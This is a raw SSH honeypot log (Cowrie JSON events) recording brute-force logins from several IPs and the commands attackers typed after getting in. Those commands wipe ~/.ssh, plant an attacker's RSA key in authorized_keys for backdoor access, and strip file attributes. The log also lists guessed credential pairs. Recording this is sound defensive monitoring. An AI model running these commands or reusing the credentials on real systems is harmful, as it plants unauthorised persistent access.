{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:20:17.415321Z","src_ip":"152.32.190.168","session":"57f0a7375cec"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T04:20:17.416085Z","src_ip":"152.32.190.168","session":"57f0a7375cec"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T04:20:17.674281Z","src_ip":"152.32.190.168","session":"57f0a7375cec"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:20:17.675437Z","src_ip":"152.32.190.168","session":"57f0a7375cec"}
{"eventid":"cowrie.session.connect","src_ip":"152.32.190.168","src_port":34902,"dst_ip":"1.2.3.4","dst_port":22,"session":"8df4e6511bd3","protocol":"ssh","message":"New connection: 152.32.190.168:34902 (1.2.3.4:22) [session: 8df4e6511bd3]","sensor":"my-vps","timestamp":"2025-09-09T04:20:17.936695Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:20:17.937433Z","src_ip":"152.32.190.168","session":"8df4e6511bd3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:20:18.199698Z","src_ip":"152.32.190.168","session":"8df4e6511bd3"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T04:20:19.290984Z","src_ip":"152.32.190.168","session":"8df4e6511bd3"}
{"eventid":"cowrie.session.connect","src_ip":"103.59.95.12","src_port":39014,"dst_ip":"1.2.3.4","dst_port":22,"session":"014533a9318b","protocol":"ssh","message":"New connection: 103.59.95.12:39014 (1.2.3.4:22) [session: 014533a9318b]","sensor":"my-vps","timestamp":"2025-09-09T04:20:19.356370Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:20:19.357215Z","src_ip":"103.59.95.12","session":"014533a9318b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:20:19.980872Z","src_ip":"103.59.95.12","session":"014533a9318b"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:20:20.555482Z","src_ip":"152.32.190.168","session":"8df4e6511bd3"}
{"eventid":"cowrie.session.connect","src_ip":"152.32.190.168","src_port":45320,"dst_ip":"1.2.3.4","dst_port":22,"session":"8875efb23ac0","protocol":"ssh","message":"New connection: 152.32.190.168:45320 (1.2.3.4:22) [session: 8875efb23ac0]","sensor":"my-vps","timestamp":"2025-09-09T04:20:20.810223Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:20:20.811848Z","src_ip":"152.32.190.168","session":"8875efb23ac0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:20:21.068905Z","src_ip":"152.32.190.168","session":"8875efb23ac0"}
{"eventid":"cowrie.login.success","username":"root","password":"Root12345","message":"login attempt [root/Root12345] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:20:21.108001Z","src_ip":"103.59.95.12","session":"014533a9318b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:20:21.674939Z","src_ip":"103.59.95.12","session":"014533a9318b"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:20:21.675619Z","src_ip":"103.59.95.12","session":"014533a9318b"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:20:21.676457Z","src_ip":"103.59.95.12","session":"014533a9318b"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:20:22.138551Z","src_ip":"152.32.190.168","session":"8875efb23ac0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.7","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:20:22.357288Z","src_ip":"103.59.95.12","session":"014533a9318b"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:20:22.397244Z","src_ip":"152.32.190.168","session":"8875efb23ac0"}
{"eventid":"cowrie.session.closed","duration":"7.7","message":"Connection lost after 7.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:20:22.398121Z","src_ip":"152.32.190.168","session":"57f0a7375cec"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:20:23.003284Z","src_ip":"103.59.95.12","session":"014533a9318b"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T04:20:23.003971Z","src_ip":"103.59.95.12","session":"014533a9318b"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T04:20:23.277824Z","src_ip":"103.59.95.12","session":"014533a9318b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:20:23.278747Z","src_ip":"103.59.95.12","session":"014533a9318b"}
{"eventid":"cowrie.session.connect","src_ip":"103.59.95.12","src_port":39022,"dst_ip":"1.2.3.4","dst_port":22,"session":"9ce7893531df","protocol":"ssh","message":"New connection: 103.59.95.12:39022 (1.2.3.4:22) [session: 9ce7893531df]","sensor":"my-vps","timestamp":"2025-09-09T04:20:23.563160Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:20:23.563763Z","src_ip":"103.59.95.12","session":"9ce7893531df"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:20:23.838573Z","src_ip":"103.59.95.12","session":"9ce7893531df"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T04:20:24.979837Z","src_ip":"103.59.95.12","session":"9ce7893531df"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":53874,"dst_ip":"1.2.3.4","dst_port":22,"session":"9c834bd42195","protocol":"ssh","message":"New connection: 217.72.205.35:53874 (1.2.3.4:22) [session: 9c834bd42195]","sensor":"my-vps","timestamp":"2025-09-09T04:20:25.087864Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:20:25.088875Z","src_ip":"217.72.205.35","session":"9c834bd42195"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:20:26.257684Z","src_ip":"103.59.95.12","session":"9ce7893531df"}
{"eventid":"cowrie.session.connect","src_ip":"103.59.95.12","src_port":44228,"dst_ip":"1.2.3.4","dst_port":22,"session":"547a044c0263","protocol":"ssh","message":"New connection: 103.59.95.12:44228 (1.2.3.4:22) [session: 547a044c0263]","sensor":"my-vps","timestamp":"2025-09-09T04:20:26.826224Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:20:26.883316Z","src_ip":"103.59.95.12","session":"547a044c0263"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:20:27.144550Z","src_ip":"103.59.95.12","session":"547a044c0263"}
{"eventid":"cowrie.session.connect","src_ip":"102.68.86.62","src_port":60432,"dst_ip":"1.2.3.4","dst_port":22,"session":"8ef781ba53da","protocol":"ssh","message":"New connection: 102.68.86.62:60432 (1.2.3.4:22) [session: 8ef781ba53da]","sensor":"my-vps","timestamp":"2025-09-09T04:20:27.839268Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:20:27.840123Z","src_ip":"102.68.86.62","session":"8ef781ba53da"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:20:28.010257Z","src_ip":"102.68.86.62","session":"8ef781ba53da"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:20:28.208321Z","src_ip":"103.59.95.12","session":"547a044c0263"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:20:28.470908Z","src_ip":"103.59.95.12","session":"547a044c0263"}
{"eventid":"cowrie.session.closed","duration":"9.1","message":"Connection lost after 9.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:20:28.471756Z","src_ip":"103.59.95.12","session":"014533a9318b"}
{"eventid":"cowrie.login.failed","username":"access","password":"111","message":"login attempt [access/111] failed","sensor":"my-vps","timestamp":"2025-09-09T04:20:28.729824Z","src_ip":"102.68.86.62","session":"8ef781ba53da"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:20:29.901864Z","src_ip":"102.68.86.62","session":"8ef781ba53da"}
{"eventid":"cowrie.session.connect","src_ip":"211.22.25.164","src_port":44834,"dst_ip":"1.2.3.4","dst_port":22,"session":"5c0e25774326","protocol":"ssh","message":"New connection: 211.22.25.164:44834 (1.2.3.4:22) [session: 5c0e25774326]","sensor":"my-vps","timestamp":"2025-09-09T04:20:51.484150Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:20:51.484827Z","src_ip":"211.22.25.164","session":"5c0e25774326"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:20:51.724523Z","src_ip":"211.22.25.164","session":"5c0e25774326"}
{"eventid":"cowrie.session.connect","src_ip":"192.210.135.20","src_port":39478,"dst_ip":"1.2.3.4","dst_port":22,"session":"65dda52de77d","protocol":"ssh","message":"New connection: 192.210.135.20:39478 (1.2.3.4:22) [session: 65dda52de77d]","sensor":"my-vps","timestamp":"2025-09-09T04:20:51.924394Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:20:51.925308Z","src_ip":"192.210.135.20","session":"65dda52de77d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"m